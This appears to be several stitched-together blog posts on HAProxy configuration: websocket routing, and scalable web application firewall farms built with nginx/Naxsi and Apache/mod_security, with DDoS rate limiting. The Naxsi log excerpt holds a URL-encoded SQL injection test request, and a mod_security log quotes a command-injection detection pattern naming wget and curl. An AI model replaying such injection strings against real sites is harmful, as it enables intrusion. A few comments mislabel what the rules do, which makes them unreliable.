The configuration below allows to route requests based on either Host header (if you have a dedicated host for your websocket calls) or Connection and Upgrade header (required to switch to websocket).
In the backend dedicated to websocket, HAProxy validates the setup phase and also ensure the user is requesting a right application name.
HAProxy also performs a websocket health check, sending a Connection upgrade request and expecting a 101 response status code. We can’t go further for now on the health check for now.
Optional: the web server is hosted on Apache, but could be hosted by node.js as well.

defaults
  mode http
  log global
  option httplog
  option  http-server-close
  option  dontlognull
  option  redispatch
  option  contstats
  retries 3
  backlog 10000
  timeout client          25s
  timeout connect          5s
  timeout server          25s
# timeout tunnel available in ALOHA 5.5 or HAProxy 1.5-dev10 and higher
  timeout tunnel        3600s
  timeout http-keep-alive  1s
  timeout http-request    15s
  timeout queue           30s
  timeout tarpit          60s
  default-server inter 3s rise 2 fall 3
  option forwardfor



frontend ft_web
  bind 192.168.10.3:80 name http
  maxconn 60000

## routing based on Host header
  acl host_ws hdr_beg(Host) -i ws.
  use_backend bk_ws if host_ws

## routing based on websocket protocol header
  acl hdr_connection_upgrade hdr(Connection)  -i upgrade
  acl hdr_upgrade_websocket  hdr(Upgrade)     -i websocket

  use_backend bk_ws if hdr_connection_upgrade hdr_upgrade_websocket
  default_backend bk_web



backend bk_web                                                   
  balance roundrobin                                             
  option httpchk HEAD /                                          
  server websrv1 192.168.10.11:80 maxconn 100 weight 10 cookie websrv1 check
  server websrv2 192.168.10.12:80 maxconn 100 weight 10 cookie websrv2 check



backend bk_ws                                                    
  balance roundrobin

## websocket protocol validation
  acl hdr_connection_upgrade hdr(Connection)                 -i upgrade
  acl hdr_upgrade_websocket  hdr(Upgrade)                    -i websocket
  acl hdr_websocket_key      hdr_cnt(Sec-WebSocket-Key)      eq 1
  acl hdr_websocket_version  hdr_cnt(Sec-WebSocket-Version)  eq 1
  http-request deny if ! hdr_connection_upgrade ! hdr_upgrade_websocket ! hdr_w
ebsocket_key ! hdr_websocket_version

## ensure our application protocol name is valid 
## (don't forget to update the list each time you publish new applications)
  acl ws_valid_protocol hdr(Sec-WebSocket-Protocol) echo-protocol
  http-request deny if ! ws_valid_protocol

## websocket health checking
  option httpchk GET / HTTP/1.1rnHost:\ ws.domain.comrnConnection:\ Upgrade\r\nUpgrade:\ websocket\r\nSec-WebSocket-Key:\ haproxy\r\nSec-WebSocket-Version:\ 13\r\nSec-WebSocket-Protocol:\ echo-protocol
  http-check expect status 101

  server websrv1 192.168.10.11:8080 maxconn 30000 weight 10 cookie websrv1 check
  server websrv2 192.168.10.12:8080 maxconn 30000 weight 10 cookie websrv2 check

Note that HAProxy could also be used to select different Websocket application based on the Sec-WebSocket-Protocol header of the setup phase. (later I’ll write the article about it).

Related links

Links

high performance WAF platform with Naxsi and HAProxy

Synopsis

I’ve already described WAF in a previous article, where I spoke about WAF scalability with apache and modsecurity.
One of the main issue with Apache and modsecurity is the performance. To address this issue, an alternative exists: naxsi, a Web Application Firewall module for nginx.

So using Naxsi and HAProxy as a load-balancer, we’re able to build a platform which meets the following requirements:

  • Web Application Firewall: achieved by Apache and modsecurity
  • High-availability: application server and WAF monitoring, achieved by HAProxy
  • Scalability: ability to adapt capacity to the upcoming volume of traffic, achieved by HAProxy
  • DDOS protection: blind and brutal attacks protection, slowloris protection, achieved by HAProxy
  • Content-Switching: ability to route only dynamic requests to the WAF, achieved by HAProxy
  • Reliability: ability to detect capacity overusage, this is achieved by HAProxy
  • Performance: deliver response as fast as possible, achieved by the whole platform

The picture below provides a better overview:

The LAB platform is composed by 6 boxes:

  • 2 ALOHA Load-Balancers (could be replaced by HAProxy 1.5-dev)
  • 2 WAF servers: CentOS 6.0, nginx and Naxsi
  • 2 Web servers: Debian + apache + PHP + dokuwiki

Nginx and Naxsi installation on CentOS 6

Purpose of this article is not to provide such procedue. So please read this wiki article which summarizes how to install nginx and naxsi on CentOS 6.0.

Diagram

The diagram below shows the platform with HAProxy frontends (prefixed by ft_) and backends (prefixed by bk_). Each farm is composed by 2 servers.

Configuration

Nginx and Naxsi


Configure nginx as a reverse-proxy which listen in bk_waf and forward traffic to ft_web. In the mean time, naxsi is there to analyze the requests.

server {
 proxy_set_header Proxy-Connection "";
 listen       192.168.10.15:81;
 access_log  /var/log/nginx/naxsi_access.log;
 error_log  /var/log/nginx/naxsi_error.log debug;

 location / {
  include    /etc/nginx/test.rules;
  proxy_pass http://192.168.10.2:81/;
 }

 error_page 403 /403.html;
 location = /403.html {
  root /opt/nginx/html;
  internal;
 }

 location /RequestDenied {
  return 403;
 }
}

HAProxy Load-Balancer configuration


The configuration below allows the following advanced features:

  • DDOS protection on the frontend
  • abuser or attacker detection in bk_waf and blocking on the public interface (ft_waf)
  • Bypassing WAF when overusage or unavailable
######## Default values for all entries till next defaults section
defaults
  option  http-server-close
  option  dontlognull
  option  redispatch
  option  contstats
  retries 3
  timeout connect 5s
  timeout http-keep-alive 1s
  # Slowloris protection
  timeout http-request 15s
  timeout queue 30s
  timeout tarpit 1m          # tarpit hold tim
  backlog 10000

# public frontend where users get connected to
frontend ft_waf
  bind 192.168.10.2:80 name http
  mode http
  log global
  option httplog
  timeout client 25s
  maxconn 10000

  # DDOS protection
  # Use General Purpose Couter (gpc) 0 in SC1 as a global abuse counter
  # Monitors the number of request sent by an IP over a period of 10 seconds
  stick-table type ip size 1m expire 1m store gpc0,http_req_rate(10s),http_err_rate(10s)
  tcp-request connection track-sc1 src
  tcp-request connection reject if { sc1_get_gpc0 gt 0 }
  # Abuser means more than 100reqs/10s
  acl abuse sc1_http_req_rate(ft_web) ge 100
  acl flag_abuser sc1_inc_gpc0(ft_web)
  tcp-request content reject if abuse flag_abuser

  acl static path_beg /static/ /dokuwiki/images/
  acl no_waf nbsrv(bk_waf) eq 0
  acl waf_max_capacity queue(bk_waf) ge 1
  # bypass WAF farm if no WAF available
  use_backend bk_web if no_waf
  # bypass WAF farm if it reaches its capacity
  use_backend bk_web if static waf_max_capacity
  default_backend bk_waf

# WAF farm where users' traffic is routed first
backend bk_waf
  balance roundrobin
  mode http
  log global
  option httplog
  option forwardfor header X-Client-IP
  option httpchk HEAD /waf_health_check HTTP/1.0

  # If the source IP generated 10 or more http request over the defined period,
  # flag the IP as abuser on the frontend
  acl abuse sc1_http_err_rate(ft_waf) ge 10
  acl flag_abuser sc1_inc_gpc0(ft_waf)
  tcp-request content reject if abuse flag_abuser

  # Specific WAF checking: a DENY means everything is OK
  http-check expect status 403
  timeout server 25s
  default-server inter 3s rise 2 fall 3
  server waf1 192.168.10.15:81 maxconn 100 weight 10 check
  server waf2 192.168.10.16:81 maxconn 100 weight 10 check

# Traffic secured by the WAF arrives here
frontend ft_web
  bind 192.168.10.2:81 name http
  mode http
  log global
  option httplog
  timeout client 25s
  maxconn 1000
  # route health check requests to a specific backend to avoid graph pollution in ALOHA GUI
  use_backend bk_waf_health_check if { path /waf_health_check }
  default_backend bk_web

# application server farm
backend bk_web
  balance roundrobin
  mode http
  log global
  option httplog
  option forwardfor
  cookie SERVERID insert indirect nocache
  default-server inter 3s rise 2 fall 3
  option httpchk HEAD /
  # get connected on the application server using the user ip
  # provided in the X-Client-IP header setup by ft_waf frontend
  source 0.0.0.0 usesrc hdr_ip(X-Client-IP)
  timeout server 25s
  server server1 192.168.10.11:80 maxconn 100 weight 10 cookie server1 check
  server server2 192.168.10.12:80 maxconn 100 weight 10 cookie server2 check

# backend dedicated to WAF checking (to avoid graph pollution)
backend bk_waf_health_check
  balance roundrobin
  mode http
  log global
  option httplog
  option forwardfor
  default-server inter 3s rise 2 fall 3
  timeout server 25s
  server server1 192.168.10.11:80 maxconn 100 weight 10 check
  server server2 192.168.10.12:80 maxconn 100 weight 10 check

Detecting attacks


On the load-balancer


The ft_waf frontend stick table tracks two information: http_req_rate and http_err_rate which are respectively the http request rate and the http error rate generated by a single IP address.
HAProxy would automatically block an IP which has generated more than 100 requests over a period of 10s or 10 errors (WAF detection 403 responses included) in 10s. The user is blocked for 1 minute as long as he keeps on abusing.
Of course, you can setup above values to whatever you need: it is fully flexible.

To know the status of IPs in your load-balancer, just run the command below:

echo show table ft_waf | socat /var/run/haproxy.stat - 
# table: ft_waf, type: ip, size:1048576, used:1
0xc33304: key=192.168.10.254 use=0 exp=4555 gpc0=0 http_req_rate(10000)=1 http_err_rate(10000)=1

Note: The ALOHA Load-balancer does not provide watch tool, but you can monitor the content of the table in live with the command below:

while true ; do echo show table ft_waf | socat /var/run/haproxy.stat - ; sleep 2 ; clear ; done

On the Waf


Every Naxsi error log appears in /var/log/nginx/naxsi_error.log. IE:

2012/10/16 13:40:13 [error] 10556#0: *10293 NAXSI_FMT: ip=192.168.10.254&server=192.168.10.15&uri=/testphp.vulnweb.com/artists.php&total_processed=3195&total_blocked=2&zone0=ARGS&id0=1000&var_name0=artist, client: 192.168.10.254, server: , request: "GET /testphp.vulnweb.com/artists.php?artist=0+div+1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2Ccurrent_user HTTP/1.1", host: "192.168.10.15:81"

Naxsi log line is less obvious than modsecurity one. The rule which matched os provided by the argument idX=abcde.
No false positive during the test, I had to build a request to make Naxsi match it 🙂 .

conclusion


Today, we saw it’s easy to build a scalable and performing WAF platform in front of any web application.
The WAF is able to communicate to HAProxy which IPs to automatically blacklist (throuth error rate monitoring), which is convenient since the attacker won’t bother the WAF for a certain amount of time 😉
The platform allows to detect WAF farm availability and to bypass it in case of total failure, we even saw it is possible to bypass the WAF for static content if the farm is running out of capacity. Purpose is to deliver a good end-user experience without dropping too much the security.
Note that it is possible to route all the static content to the web servers (or a static farm) directly, whatever the status of the WAF farm.
This make me say that the platform is fully scallable and flexible.
Thanks to HAProxy, the architecture is very flexible: I could switch my apache + modexurity to nginx + naxsi with no issues at all 🙂 This could be done as well for any third party waf appliances.
Note that I did not try any naxsi advanced features like learning mode and the UI as well.

Related links

Links

Scalable WAF protection with HAProxy and Apache with modsecurity

Greeting to Thomas Heil, from our German partner Olanis, for his help in Apache and modsecurity configuration assistance.

What is a Web Application Firewall (WAF)?

Years ago, it was common to protect networks using a firewall… Well known devices which filter traffic at layer 3 and 4…
Now, the failures have moved from the network stack to the application layer, making the old firewall useless and obsolete (for protection purpose I mean). We used then to deploy IDS or IPS, which tried to match attacks at a packet level. These products are usually very hard to tune.
Then the Web Application Firewall arrived: it’s a firewall aware of the layer 7 protocol in order to be more efficient when deciding to block requests (or responses).
This is because the attacks became more complicated, like the SQL Injection, Cross Site scripting, etc…

One of the most famous opensource WAF is mod_security, which works as a module on Apache webserver and IIS for a long time and has been announced recently for nginx too.
A very good alternative is naxsi, a module for nginx, still young but very promising.

On today’s article, I’ll focus on modsecurity for Apache. In a next article, I’ll build the same platform with naxsi and nginx.

Scalable WAF platform


The main problem with WAF, is that they require a lot of resources to analyse each requests headers and body. (it can even be configured to analyze the response). If you want to be able to protect all your upcoming traffic, then you must think scalability.
In the present article I’m going to explain how to build a reliable and scalable platform where WAF capacity won’t be an issue. I could add “and where WAF maintenance could be done during business hours).
Here are the basic purpose to achieve:

  • Web Application Firewall: achieved by Apache and modsecurity
  • High-availability: application server and WAF monitoring, achieved by HAProxy
  • Scalability: ability to adapt capacity to the upcoming volume of traffic, achieved by HAProxy

It would be good if the platform would achieve the following advanced features:

  • DDOS protection: blind and brutal attacks protection, slowloris protection, achieved by HAProxy
  • Content-Switching: ability to route only dynamic requests to the WAF, achieved by HAProxy
  • Reliability: ability to detect capacity overusage, this is achieved by HAProxy
  • Performance: deliver response as fast as possible, achieved by the whole platform

Web platform with WAF Diagram

The diagram below shows the platform with HAProxy frontends (prefixed by ft_) and backends (prefixed by bk_). Each farm is composed by 2 servers.

As you can see, at first, it seems all the traffic goes to the WAFs, then comes back in HAProxy before being routed to the web servers. This would be the basic configuration, meeting the following basic requirements: Web Application Firewall, High-Availability, Scalability.

Platform installation


As load-balancer, I’m going to use our well known ALOHA 🙂
The web servers are standard debian with apache and PHP, the application used on top of it is dokuwiki. I have no procedure for this one, this is very straight forward!
The WAF run on CentOS 6.3 x86_64, using modsecurity 2.5.8. The installation procedure is outside of the scope of this article, so I documented it on my personal wiki.
All of these servers are virtualized on my laptop using KVM, so NO, I won’t run performance benchmark, it would be ridiculous!

Configuration

WAF configuration


Basic configuration here, no tuning at all. The purpose is not to explain how to configure a WAF, sorry.

Apache Configuration


Modification to the file /etc/httpd/conf/httpd.conf:

Listen 192.168.10.15:81
[...]
LoadModule security2_module modules/mod_security2.so
LoadModule unique_id_module modules/mod_unique_id.so
[...]
NameVirtualHost 192.168.10.15:81
[...]
<IfModule mod_security2.c>
        SecPcreMatchLimit 1000000
        SecPcreMatchLimitRecursion 1000000
        SecDataDir logs/
</IfModule>
<VirtualHost 192.168.10.15:81>
        ServerName *
        AddDefaultCharset UTF-8

        <IfModule mod_security2.c>
                Include modsecurity.d/modsecurity_crs_10_setup.conf
                Include modsecurity.d/aloha.conf
                Include modsecurity.d/rules/*.conf

                SecRuleEngine On
                SecRequestBodyAccess On
                SecResponseBodyAccess On
        </IfModule>

        ProxyPreserveHost On
        ProxyRequests off
        ProxyVia Off
        ProxyPass / http://192.168.10.2:81/
        ProxyPassReverse / http://192.168.10.2:81/
</VirtualHost>

Basically, we just turned Apache into a reverse-proxy, accepting traffic for any server name, applying modsecurity rules before routing traffic back to HAProxy frontend dedicated to web servers.

Client IP


HAProxy works has a reverse proxy and so will use its own IP address to get connected on the WAF server. So you have to install mod_rpaf to get the client IP in the WAF for both tracking and logging.
To install mod_rpaf, follow these instructions: apache mod_rpaf installation.
Concerning its configuration, we’ll do it as below, edit the file /etc/httpd/conf.d/mod_rpaf.conf:

LoadModule rpaf_module modules/mod_rpaf-2.0.so

<IfModule rpaf_module>
        RPAFenable On
        RPAFproxy_ips 192.168.10.1 192.168.10.3
        RPAFheader X-Client-IP
</IfModule>

modsecurity custom rules

In the Apache configuration there is a directive which tells modsecurity to load a file called aloha.conf. The purpose of this file is to tell to modsecurity to deny the health check requests from HAProxy and to prevent logging them.
HAProxy will consider the WAF as operational only if it gets a 403 response to this request. (see HAProxy configuration below).
Content of the file /etc/httpd/modsecurity.d/aloha.conf:

SecRule REQUEST_FILENAME "/waf_health_check" "nolog,deny"

Load-Balancer (HAProxy) configuration for basic usage


The configuration below is the first shoot we do when deploying such platform, it is basic, simple and straight forward:

######## Default values for all entries till next defaults section
defaults
  option  http-server-close
  option  dontlognull
  option  redispatch
  option  contstats
  retries 3
  timeout connect 5s
  timeout http-keep-alive 1s
  # Slowloris protection
  timeout http-request 15s
  timeout queue 30s
  timeout tarpit 1m          # tarpit hold tim
  backlog 10000

# public frontend where users get connected to
frontend ft_waf
  bind 192.168.10.2:80 name http
  mode http
  log global
  option httplog
  timeout client 25s
  maxconn 1000
  default_backend bk_waf

# WAF farm where users' traffic is routed first
backend bk_waf
  balance roundrobin
  mode http
  log global
  option httplog
  option forwardfor header X-Client-IP
  option httpchk HEAD /waf_health_check HTTP/1.0
  # Specific WAF checking: a DENY means everything is OK
  http-check expect status 403
  timeout server 25s
  default-server inter 3s rise 2 fall 3
  server waf1 192.168.10.15:81 maxconn 100 weight 10 check
  server waf2 192.168.10.16:81 maxconn 100 weight 10 check

# Traffic secured by the WAF arrives here
frontend ft_web
  bind 192.168.10.2:81 name http
  mode http
  log global
  option httplog
  timeout client 25s
  maxconn 1000
  # route health check requests to a specific backend to avoid graph pollution in ALOHA GUI
  use_backend bk_waf_health_check if { path /waf_health_check }
  default_backend bk_web

# application server farm
backend bk_web
  balance roundrobin
  mode http
  log global
  option httplog
  option forwardfor
  cookie SERVERID insert indirect nocache
  default-server inter 3s rise 2 fall 3
  option httpchk HEAD /
  timeout server 25s
  server server1 192.168.10.11:80 maxconn 100 weight 10 cookie server1 check
  server server2 192.168.10.12:80 maxconn 100 weight 10 cookie server2 check

# backend dedicated to WAF checking (to avoid graph pollution)
backend bk_waf_health_check
  balance roundrobin
  mode http
  log global
  option httplog
  option forwardfor
  default-server inter 3s rise 2 fall 3
  timeout server 25s
  server server1 192.168.10.11:80 maxconn 100 weight 10 check
  server server2 192.168.10.12:80 maxconn 100 weight 10 check

Advanced Load-Balancing (HAProxy) configuration


We’re going now to improve a bit the platform. The picture below shows which type of protection is achieved by the load-balancer and the WAF:

The configuration below adds a few more features:

  • DDOS protection on the frontend
  • abuser or attacker detection in bk_waf and blocking on the public interface (ft_waf)
  • Bypassing WAF when overusage or unavailable

Which will allow to meet the advanced requirements: DDOS protection, Content-Switching, Reliability, Performance.

######## Default values for all entries till next defaults section
defaults
  option  http-server-close
  option  dontlognull
  option  redispatch
  option  contstats
  retries 3
  timeout connect 5s
  timeout http-keep-alive 1s
  # Slowloris protection
  timeout http-request 15s
  timeout queue 30s
  timeout tarpit 1m          # tarpit hold tim
  backlog 10000

# public frontend where users get connected to
frontend ft_waf
  bind 192.168.10.2:80 name http
  mode http
  log global
  option httplog
  timeout client 25s
  maxconn 10000

  # DDOS protection
  # Use General Purpose Couter (gpc) 0 in SC1 as a global abuse counter
  # Monitors the number of request sent by an IP over a period of 10 seconds
  stick-table type ip size 1m expire 1m store gpc0,http_req_rate(10s),http_err_rate(10s)
  tcp-request connection track-sc1 src
  tcp-request connection reject if { sc1_get_gpc0 gt 0 }
  # Abuser means more than 100reqs/10s
  acl abuse sc1_http_req_rate(ft_web) ge 100
  acl flag_abuser sc1_inc_gpc0(ft_web)
  tcp-request content reject if abuse flag_abuser

  acl static path_beg /static/ /dokuwiki/images/
  acl no_waf nbsrv(bk_waf) eq 0
  acl waf_max_capacity queue(bk_waf) ge 1
  # bypass WAF farm if no WAF available
  use_backend bk_web if no_waf
  # bypass WAF farm if it reaches its capacity
  use_backend bk_web if static waf_max_capacity
  default_backend bk_waf

# WAF farm where users' traffic is routed first
backend bk_waf
  balance roundrobin
  mode http
  log global
  option httplog
  option forwardfor header X-Client-IP
  option httpchk HEAD /waf_health_check HTTP/1.0

  # If the source IP generated 10 or more http request over the defined period,
  # flag the IP as abuser on the frontend
  acl abuse sc1_http_err_rate(ft_waf) ge 10
  acl flag_abuser sc1_inc_gpc0(ft_waf)
  tcp-request content reject if abuse flag_abuser

  # Specific WAF checking: a DENY means everything is OK
  http-check expect status 403
  timeout server 25s
  default-server inter 3s rise 2 fall 3
  server waf1 192.168.10.15:81 maxconn 100 weight 10 check
  server waf2 192.168.10.16:81 maxconn 100 weight 10 check

# Traffic secured by the WAF arrives here
frontend ft_web
  bind 192.168.10.2:81 name http
  mode http
  log global
  option httplog
  timeout client 25s
  maxconn 1000
  # route health check requests to a specific backend to avoid graph pollution in ALOHA GUI
  use_backend bk_waf_health_check if { path /waf_health_check }
  default_backend bk_web

# application server farm
backend bk_web
  balance roundrobin
  mode http
  log global
  option httplog
  option forwardfor
  cookie SERVERID insert indirect nocache
  default-server inter 3s rise 2 fall 3
  option httpchk HEAD /
  # get connected on the application server using the user ip
  # provided in the X-Client-IP header setup by ft_waf frontend
  source 0.0.0.0 usesrc hdr_ip(X-Client-IP)
  timeout server 25s
  server server1 192.168.10.11:80 maxconn 100 weight 10 cookie server1 check
  server server2 192.168.10.12:80 maxconn 100 weight 10 cookie server2 check

# backend dedicated to WAF checking (to avoid graph pollution)
backend bk_waf_health_check
  balance roundrobin
  mode http
  log global
  option httplog
  option forwardfor
  default-server inter 3s rise 2 fall 3
  timeout server 25s
  server server1 192.168.10.11:80 maxconn 100 weight 10 check
  server server2 192.168.10.12:80 maxconn 100 weight 10 check

Detecting attacks


On the load-balancer


The ft_waf frontend stick table tracks two information: http_req_rate and http_err_rate which are respectively the http request rate and the http error rate generated by a single IP address.
HAProxy would automatically block an IP which has generated more than 100 requests over a period of 10s or 10 errors (WAF detection 403 responses included) in 10s. The user is blocked for 1 minute as long as he keeps on abusing.
Of course, you can setup above values to whatever you need: it is fully flexible.

To know the status of IPs in your load-balancer, just run the command below:

echo show table ft_waf | socat /var/run/haproxy.stat - 
# table: ft_waf, type: ip, size:1048576, used:1
0xc33304: key=192.168.10.254 use=0 exp=4555 gpc0=0 http_req_rate(10000)=1 http_err_rate(10000)=1

Note: The ALOHA Load-balancer does not provide watch, but you can monitor the content of the table in live with the command below:

while true ; do echo show table ft_waf | socat /var/run/haproxy.stat - ; sleep 2 ; clear ; done

On the Waf


I have not setup anything particular on WAF logging, so every errors appears in /var/log/httpd/error_log. IE:

[Fri Oct 12 10:48:21 2012] [error] [client 192.168.10.254] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:(?:[\\;\\|\\`]\\W*?\\bcc|\\b(wget|curl))\\b|\\/cc(?:[\\'\"\\|\\;\\`\\-\\s]|$))" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2.2.5"] [msg "System Command Injection"] [data "/cc-"] [severity "CRITICAL"] [tag "WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "mywiki"] [uri "/dokuwiki/lib/images/license/button/cc-by-sa.png"] [unique_id "UHfZVcCoCg8AAApVAzsAAAAA"]

Seems to be a false positive 🙂

Conclusion


Today, we saw it’s easy to build a scalable and well performing WAF platform in front of our web application.
The WAF is able to communicate to HAProxy which IPs to automatically blacklist (throuth error rate monitoring), which is convenient since the attacker won’t bother the WAF for a certain amount of time 😉
The platform allows to detect WAF farm availability and to bypass it in case of total failure, we even saw it is possible to bypass the WAF for static content if the farm is running out of capacity. Purpose is to deliver a good end-user experience without dropping too much the security.
Note that it is possible to route all the static content to the web servers (or a static farm) directly, whatever the status of the WAF farm.
This make me say that the platform is fully scallable and flexible.
Also, bear in mind to monitor your WAF logs, as shown in the example above, there was a false positive preventing an image to be loaded from dokuwiki.

Related links

Links